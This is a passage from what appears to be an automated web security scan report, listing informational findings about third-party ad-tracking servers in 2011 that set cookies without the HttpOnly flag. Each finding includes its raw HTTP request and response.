rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; rsi_us_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
Set-Cookie: NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:23:12 GMT; Path=/
Set-Cookie: rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
X-Proc-ms: 9
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:23:11 GMT

GIF89a.............!.......,...........D..;

14.541. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
  • rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
  • NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 21:06:44 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K04491/b3/0/3/1003161/978210799.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.autobytel.com%252Fx22%253FChannel%253D%2526Make%253D%2526Category%253D%2526Site%253DAutobytel.com%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F31%26DM_EOM%3D1&C=K04491 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
Set-Cookie: rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
Set-Cookie: NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 21:06:44 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 24 Jan 2011 21:06:44 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs = ['K04491_10002'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K04491_10002'],'k04491');}

14.542. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
  • NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K04491/b3/0/3/1003161/978210799.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=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; rsi_segs_1000000=pUPFfEOlLgIYlVNWKZU1sWJH1I8V0sD586OtYWpJIZ5At588pHu0XtJj0vEjmwH5W+0fVgtXKwemg4X+X+ZcSFKrAeiVdwmYRcxYnZGANiwodqN5uhpI2RG7gf2tidEme72Dc6LcL4puWziUNiMSVj9Rlec2UMv/RY8CSw1fUUBq299ft5vcz4/QVANk+xUmIlgaIoFCnYcBk/VuIcXautuNt5oFCJuLKVA=; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; rsi_us_1000000=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; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 24 Jan 2011 22:48:45 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs = ['K04491_10002'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K04491_10002'],'k04491');}

14.543. http://pixel.33across.com/ps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295919347123%3As2.33%3D%2C6693%2C6993%2C4150%2C4793%2C973%2C2502%2C5393%2C; Domain=.33across.com; Expires=Wed, 25-Jan-2012 01:35:47 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=141&cgn=13888&seg=6770 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295482376917

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 01:35:46 GMT
Server: 33X6
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Location: http://segment-pixel.invitemedia.com/pixel?partnerID=38&key=segment&code=6770&random=303331
Content-Length: 0
Set-Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295919347123%3As2.33%3D%2C6693%2C6993%2C4150%2C4793%2C973%2C2502%2C5393%2C; Domain=.33across.com; Expires=Wed, 25-Jan-2012 01:35:47 GMT; Path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


14.544. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ts=1295919347; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
  • uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/img?mt_id=1524&mt_adid=221 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ts=1295637719; uuid=4d3702bc-839e-0690-5370-3c19a9561295

Response

HTTP/1.1 200 OK
Server: mt2/1.2.3.967 Oct 13 2010-13:40:24 ewr-pixel-n1a pid 0x12c2 4802
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 25 Jan 2011 01:35:47 GMT
Etag: 4d3702bc-839e-0690-5370-3c19a9561295
Connection: Keep-Alive
Set-Cookie: ts=1295919347; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: trx=008; domain=.mathtag.com; path=/; expires=Sat, 19-Nov-2010 18:21:31 GMT
Set-Cookie: uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.545. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • d=ENMADqANq0itiBABlQEB8QWB0wCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA; expires=Sun, 24-Apr-2011 21:54:47 GMT; path=/; domain=.quantserve.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1748518845;fpan=1;fpa=P0-2130372027-1295906131971;ns=1;url=http%3A%2F%2Fc5.zedo.com%2Fjsc%2Fc5%2Fff2.html%3Fn%3D305%3Bc%3D2290%2F2289%2F1%3Bs%3D788%3Bd%3D9%3Bw%3D300%3Bh%3D250;ref=http%3A%2F%2Fwww1.whdh.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1295906131970;tzo=360;a=p-02uqnnIGWyZdo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EO0ADqANq0itiBABlQEB7gWB8gCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=ENMADqANq0itiBABlQEB8QWB0wCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA; expires=Sun, 24-Apr-2011 21:54:47 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 24 Jan 2011 21:54:47 GMT
Server: QS


14.546. http://pixel.quantserve.com/seg/p-9dsZX-5zhUuTg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/p-9dsZX-5zhUuTg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • d=EJEADqANq0itiBABswEB8gWB8wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA; expires=Mon, 25-Apr-2011 03:06:44 GMT; path=/; domain=.quantserve.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-9dsZX-5zhUuTg.js HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=ELIADqANq0itiBABswEB8QWB0wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EJEADqANq0itiBABswEB8gWB8wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA; expires=Mon, 25-Apr-2011 03:06:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S18099:E0-1972111918-1295924804754"
Cache-Control: private, no-transform, max-age=600
Expires: Tue, 25 Jan 2011 03:16:44 GMT
Content-Length: 548
Date: Tue, 25 Jan 2011 03:06:44 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...

14.547. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1%263615%3D1; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.rubiconproject.com
  • rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C%263615%3D9329%2C0%2C1%2C%2C; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.pixel.rubiconproject.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=3615 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; ruid=154d290e46adc1d6f373dd09^3^1294539219^2915161843; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; khaos=GIPAEQ2D-C-IOYY; lm="9 Jan 2011 02:15:20 GMT"; cd=false; put_2081=CA-00000000456885722; rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1; rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1%263615%3D1; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C%263615%3D9329%2C0%2C1%2C%2C; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.548. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:46 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=4&mpid=1051202&fpid=3&rnd=3797505172801460594&nu=n&sp=y
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
